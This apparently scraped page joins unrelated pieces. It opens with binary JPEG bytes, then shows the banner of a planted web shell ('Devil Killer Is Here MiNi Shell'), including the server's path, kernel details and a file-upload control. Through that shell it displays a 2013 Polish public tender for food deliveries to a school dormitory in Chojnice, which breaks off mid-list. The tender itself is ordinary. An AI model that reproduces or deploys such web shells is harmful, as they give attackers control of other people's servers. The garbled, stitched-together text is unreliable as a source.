JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131125/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131125/481050-N-2013.html

<p class="kh_header"><b>Chojnice: dostawy sukcesywne artykułów żywnościowych z podziałem na części</b><br>
<b>Numer ogłoszenia: 481050 - 2013; data zamieszczenia: 25.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowa Bursa dla Młodzieży Szkolnej , ul. Świętopełka 1, 89-620 Chojnice, woj. pomorskie, tel. 0-52 3972996, faks 0-52 3972996.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bursa.chojnice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawy sukcesywne artykułów żywnościowych z podziałem na części.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są dostawy sukcesywne artykułów żywnościowych, zgodnie z poniższym podziałem na części zwanych dalej pakietami:

Pakiet I - dostawa mięsa i wędlin, których ilość i asortyment zostały określone w załączniku nr 1 do SIWZ,

Pakiet II  - dostawa mleka i artykułów mleczarskich, których ilość i asortyment zostały określone w załączniku nr 2 do SIWZ,

Pakiet III -  dostawa pieczywa, panierki i ciasta, których ilość i asortyment zostały określone w załączniku nr 3 do SIWZ,


Pakiet IV - dostawa warzyw i owoców, których ilość i asortyment zostały określone w załączniku nr 4 do SIWZ,


Pakiet V - dostawa ryb i artykułów mrożonych, których ilość i asortyment zostały określone w załączniku nr 5 do SIWZ,


Pakiet VI - dostawa artykułów spożywczych, których ilość i asortyment zostały określone w załączniku nr 6 do SIWZ,


Pakiet VII - dostawa ziemniaków jadalnych, których ilość i została określona w załączniku nr 7 do SIWZ,


Pakiet VIII - dostawa ziemniaków jadalnych których ilość została określona w załączniku nr 8 do SIWZ,


Pakiet IX  - dostawa ziemniaków jadalnych, których ilość została określona w załączniku nr 9 do SIWZ,


Pakiet X - dostawa ziemniaków jadalnych, których ilość została określona w załączniku nr 10 do SIWZ,.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.86.00.00-4, 15.87.00.00-7, 15.83.12.00-4, 15.33.00.00-0, 15.85.11.00-9, 15.61.00.00-7, 15.40.00.00-5, 15.84.00.00-8, 15.51.00.00-6, 15.53.00.00-2, 15.54.00.00-5, 15.55.10.00-5, 15.43.11.00-9, 15.81.00.00-9, 15.30.00.00-0, 03.22.00.00-0, 15.24.00.00-2, 03.21.21.00-0, 15.11.00.00-2, 15.13.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena na podstawie oświadczenia wykonawcy, że spełnia wszystkie warunki określone przepisami art. 22 ust. 1 ustawy;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonania oceny tego warunku:

Warunek uzna się za spełniony jeżeli Wykonawca wykażę, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonywał lub wykonuje co najmniej  1 dostawę w zakresie realizacji odpowiadających swoim rodzajem przedmiotowi zamówienia o wartości nie mniejszej niż
Pakiet I - 20 000,00 PLN
Pakiet II - 20 000,00 PLN
Pakiet III - 20 000,00 PLN
Pakiet IV - 20 000,00 PLN
Pakiet V - 20 000,00 PLN
Pakiet VI - 20 000,00 PLN
Pakiet VII - 5 000,00 PLN
Pakiet VIII - 5 000,00 PLN
Pakiet IX - 5 000,00 PLN
Pakiet X - 5 000,00 PLN
 każda z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena na podstawie oświadczenia wykonawcy, że spełnia wszystkie warunki określone przepisami art. 22 ust. 1 ustawy;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena na podstawie oświadczenia wykonawcy, że spełnia wszystkie warunki określone przepisami art. 22 ust. 1 ustawy;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena na podstawie oświadczenia wykonawcy, że spełnia wszystkie warunki określone przepisami art. 22 ust. 1 ustawy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bursa.chojnice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowa Bursa dla Młodzieży Szkolnej w Chojnicach
ul. Świętopełka 1
89-620 Chojnice
p. 101 sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.12.2013 godzina 08:30, miejsce: Powiatowa Bursa dla Młodzieży Szkolnej w Chojnicach
ul. Świętopełka 1
89-620 Chojnice
p. 101 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> dostawa mięsa i wędlin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	baleron gotowany	kg	25
2	kiełbasa biała parzona	kg	70
3	kiełbasa jałowcowa	kg	5
4	kiełbasa krakowska parzona	kg	20
5	kiełbasa krakowska sucha	kg	40
6	kiełbasa zwyczajna	kg	120
7	szynka w galarecie	kg	20
8	metka łososiowa	kg	35
9	ogonówka  parzona	kg	50
10	parówki cienkie
zawartość mięsa min 80%	kg	60
11	pasztet pieczony	kg	20
12	pasztetowa wieprzowa 	kg	20
13	pasztet z przyprawami	kg	20
14	pieczeń kanapkowa	kg	20
15	piwna	kg	40
16	polędwica sopocka	kg	50
17	serdelki wieprzowe	kg	80
18	szynka wiejska	kg	30
19	szynka gotowana w siatce	kg	50
20	szynka konserwowa z kurczaka	kg	50
21	szynka cygańska	kg	30
22	łopatka z przyprawami	kg	40
23	szynkówka	kg	30
24	szynkowa z indyka	kg	40
25	szynkówka drobiowa	kg	50
26	tatrzańska	kg	50
27	szynka konserwowa	kg	40
28	schab w przyprawach	kg	30
29	salami	kg	30
30	żywiecka	kg	50
31	pierś z indyka wędzona	kg	40
32	 schab wieprzowy z/k	kg	70
33	 schab wieprzowy b/k	kg	550
34	 karkówka wiep. z/k	kg	20
35	 karkówka wiep. b/k	kg	250
36	 łopatka wieprzowa b/k	kg	140
37	mięso wieprzowe b/k 
szynka myszka  	kg	300
38	 wołowina extra	kg	10
39	 wątroba wieprzowa	kg	5
40	 mięso mielone	kg	500
41	 kości 	kg	10
42	 boczek surowy	kg	60
43	 boczek wędzony paski	kg	150
44	 kurczaki świeże	kg	300
45	 filety z kurczaka-piersi	kg	460
46	 pałki z kurczaka	kg	100
47	udka z kurczaka	kg	260
48	 porcje rosołowe	kg	300
49	filet z indyka piersi	kg	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2, 15.13.00.00-8, 15.11.20.00-6, 15.13.11.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> dostawa mleka i artykułów mleczarskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Jogurt z kawałkami owoców 150g	szt	400
2	Jogurt owocowy 150g	szt	1700
3	Jogurt naturalny 150g	szt	120
4	Masło śmietankowe
zawartość tłuszczu
 min 82% tłuszczu 200g	szt	1400
5	Mleko UHT
o zawrt. tłuszczu  2%	litr	6800
6	Ser żółty twardy Edamski
zawartość tłuszczu
w suchej masie min 40%	kg	80
7	Ser żółty twardy Królewskii
zawartość tłuszczu
w suchej masie min 40%	kg	80
8	Ser żółty twardy Salami
zawartość tłuszczu
w suchej masie min 40%	kg	380
9	Ser żółty twardy dziurawiec
zawartość tłuszczu
w suchej masie min 40%	kg	80
10	Ser żółty twardy Gouda
zawartość tłuszczu
w suchej masie min 40%	kg	80
11	Ser topiony (kostka)
skład: ser dojrzewający min 27%	kg	120
12	ser topiony zegar 200g	szt	40
13	ser topiony plastry 150g	szt	300
14	Ser twardy wędzony	kg	60
15	Serek kanapkowy
 twarogowy z dodatkami 150g	szt	150
16	Serek homogenizowany 150g	szt	2300
17	Serek twarożkowy 200g	szt	300
18	Śmietanka 18% słodka 500ml	szt	1000
19	Śmietana 30% słodka 500ml 	szt	20
20	Twarożek grani 200g	szt	200
21	Twaróg półtłusty kostka 200g	szt	1500
22	Wyrób seropodobny
dobrze topiący się kg	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.51.00.00-6, 15.53.00.00-2, 15.54.00.00-5, 15.55.10.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> dostawa pieczywa, panierki i ciasta.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Chleb (krojony)	1302kg
2	Panierka		160kg
3	Bułka wrocławska	2000kg
4	Chleb razowy (krojony)	100kg
5	Chleb graham (krojony)	100kg
6	Chleb słonecznikowy (krojony) 175kg
7	Chleb wiejski (krojony)	100kg
8	Chleb wieloziarnisty (krojony) 1000kg
9	Drożdżówka - sznek 104kg
10	Bułka podłużna do zapiekanki	 144kg
11	Pączek	77kg
12	Spód do pizzy	120kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> dostawa warzyw i owoców.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	banany	kg	50
2	brokuły	kg	40
3	brukiew	kg	70
4	brzoskwinie	kg	50
5	buraki	kg	450
6	cebula	kg	330
7	cytryna	kg	7
8	fasola szparagowa	kg	20
9	gruszki	kg	20
10	jabłka	kg	1000
11	kalafior	szt	50
12	kapusta czerwona	kg	200
13	kapusta kiszona	kg	300
14	kapusta pekińska	kg	300
15	Kapusta  świeża	kg	600
16	kapusta biała-młoda 	szt	80
17	kapusta włoska	kg	50
18	kiwi	kg	35
19	koper	pęczek	350
20	koper	kg	5
21	mandarynka	kg	150
22	marchew płukana	kg	1100
23	nektarynki	kg	70
24	ogórek kiszony	kg	340
25	ogórek świeży	kg	400
26	papryka świeża	kg	100
27	pieczarki	kg	500
28	pietruszka korzeń płukana	kg	130
29	pietruszka nać	pęczek	80
30	pomarańcz	kg	80
31	pomidor	kg	400
32	por	kg	130
33	Por młody	szt	80
34	rzodkiewka	pęczek	30
35	rzodkiew biała	kg	100
36	sałata	szt	300
37	seler płukany	kg	350.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-0, 03.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> dostawa ryb i artykułów mrożonych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	makrela wędzona - tuszki	kg	90
2	delfinki - mrożone	kg	30
3	kotlet rybny - mrożony	kg	90
4	panga mrożona	kg	80
5	kostka z mintaja	kg	100
6	kostka z mintaja panierowana	kg	40
7	kostka z morszczuka	kg	70
8	tilapia filet - glazura min 15%	kg	100
9	dorsz czerniak - filet (szaterpak)	kg	50
10	miruna ze skórą - filet (szaterpak)	kg	50
11	kalafior mrożony	kg	100
12	brokuły mrożone	kg	80
13	mieszanka - leczo 450g	szt	140
14	mieszanka kompotowa 450g	szt	100
15	wiśnie mrożone b/p 450g	szt	100
16	sałatka pik. z makreli EO 	szt	500
17	śledź Bismarck	kg	40
18	śledź Matyjas	kg	15
19	śledź - filet w pomidorze	szt	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.24.00.00-2, 15.30.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> dostawa artykułów spożywczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Ananasy konserwowe plastry	565g	szt	180
2	Batonik toffi w czekoladzie	45g	szt	500
3	Batonik z orzeszkami w czekoladzie	50g	szt	400
4	Budyń	65g	szt	30
5	Chrzan tarty	200g	szt	15
6	Ciastka kruche różne kształty i smaki	1kg	kg	40
7	Cukier biały kryształ	1kg	kg	620
8	Cukier puder	500g	kg	14
9	Cukier waniliowy	16g	szt	200
10	Cukierki czekoladowe z nadzieniem różne smaki	1kg	kg	25
11	Cukierki owocowe różne smaki	1kg	kg	15
12	Cukierki toffi różne smaki	1kg	kg	10
13	Cynamon	15g	szt	20
14	Czekolada gorzka	100g	szt	10
15	Czekolada z dodatkami
Skład: masa kakaowa minimum 30%, masa mleczna minimum 15%	100g	szt	200
16	Drożdże	100g	szt	20
17	Dżem brzoskwiniowy niskosłodzony
pełen kawałków owoców
bez konserwantów (E202, E211)
	280g	szt	600
18	Dżem czarna porzeczka niskosłodzony
pełen kawałków owoców
bez konserwantów (E202, E211)	280g	szt	400
19	Dżem jagodowy niskosłodzony
pełen kawałków owoców
bez konserwantów (E202, E211)	280g	szt	300
20	Dżem truskawkowy niskosłodzony
pełen kawałków owoców
bez konserwantów (E202, E211)	280g	szt	800
21	Dżem wiśniowy niskosłodzony
pełen kawałków owoców
bez konserwantów (E202, E211)	280g	szt	500
22	Fasola sucha	500g	szt	130
23	Fasolka konserwowa czerwona	400g	szt	30
24	Fasolka konserwowa w słoiku	900ml po
odcieku
510g	szt	200
25	Galaretka owocowa (różne smaki)	50g	szt	15
26	Groch konserwowy
Skład: groszek zielony, woda, sól
Wartość odżywcza w 100g wyrobu 64 kcal	400g po
odcieku
240g	szt	900
27	Groch suchy	500g	szt	80
28	Herbata indyjska granulowana	100g	szt	220
29	Jajka kurze (klasa L)	szt	szt	6400
30	Kakao ciemne niskotłuszczowe
(10%-12% tłuszczu)	150g	szt	240
31	Kasza jęczmienna z zastosowaniem
do zup i II dań	1kg	kg	150
32	Kasza manna	1000g	kg	8
33	Kawa inka	150g	szt	50
34	Kawa naturalna - drobno mielona z wyselekcjonowanych ziaren arabiki o delikatnym smaku i przyjemnym aromacie	500g	szt	15
35	Kawa rozpuszczalna - kawa liofilizowana z 100% kawy naturalnej	100g	szt	15
36 Ketchup
Skład: koncentrat pomidorowy min 37%	500g	szt	300
37	Kompot agrestowy	
900ml 
	szt	20
38	Koncentrat pomidorowy 30%	900ml	szt	220
39	Koper susz	6g	szt	30
40	Kukurydza konserwowa
Skład:kukurudza, woda, sól, cukier
Wartość odżywcza 100g produktu
115kcal, białko 3,9g, węglowodany
przyswajalne 22g, tłuszcz całkowitny 1,3g	400g
po 
odcieku
220g	szt	500
41	Kwasek cytrynowy	20g	szt	80
42	Liść laurowy	10g	szt	40
43	Majeranek	10g	szt	180
44	Majonez
Skład: olej roślinny, woda, ocet spirytusowy,
cukier, żółtko kurze w proszku 2,2%, sól
gorczyca	620ml	szt	150
45	Makaron, po ugotowaniu nie lepiący się, odpowiednio twardy, sprężysty, zachowuje naturalny zapach i kolor
Skład: mąka makaronowa pszenna, woda,
substancja wzbogająca-witamina A,
600wartość energetyczna w 100g 336kcal	500g	szt	650
46	Margaryna do pieczenia
- barwnik beta-karoten, zawart. sodu 0,09g, zawart. Tłuszczu min 72%	250g	szt	70
47	Margaryna do pieczywa z masłem
zawartość tłuszczu min 39%
z niską zawartością soli
	500g	szt	550
48	Marmolada wieloowocowa - twarda	1000g	szt	15
49	Masło czekoladowe do pieczywa	350g	szt	30
50	Mąka pszenna typ 500
Zastosowanie: jako zawiesina do zup i
 sosów do pieczenia ciast	1kg	kg	450
51	Mąka ziemniaczana
Skład: skrobia ziemniaczana	1kg	kg	110
52	Miód sztuczny	350g	szt	10
53	Mleko skondensowane słodzone w puszce	510g	szt	12
54	Musztarda
Skład: woda, gorczyca, ocet spirytusowy,
cukier, sól, przyprawy	200g	szt	100
55	Ocet	500ml	szt	120
56	Ogórki konserwowe	900ml	szt	300
57	Olej uniwersalny	1000ml	szt	300
58	Papryka konserwowa	900ml	szt	40
59	Papryka sucha	20g	szt	120
60	Pieprz mielony	20g	szt	430
61	Pieprz ziarnisty	15g	szt	80
62	Płatki kukurydziane
Skład:kukurydza 98%	500g	szt	30
63	Płatki sniadaniowe w różnych smakach z pełnego ziarna	250g	szt	70
64	Proszek do pieczenia	30g	szt	160
65	Przyprawa bazylia	10g	szt	120
66	Przyprawa do gyrosa	20g	szt	130
67	Przyprawa do kurczaka	20g	szt	50
68	Przyprawa jarzynka	200g	szt	30
69	Przyprawa oregano	10g	szt	120
70	Przyprawa kurkuma mielona	20g	szt	10
71	Przyprawa do potraw meksykańskich	25g	szt	30
72	Przyprawa do chińszczyzny	25g	szt	30
73	Przyprawa curry	20g	szt	10
74	Przyprawa w płynie do zup i sosów
Skład: woda, sól, substancja wzmacniająca
smak i zapach:glutaminian sodu:barwnik:
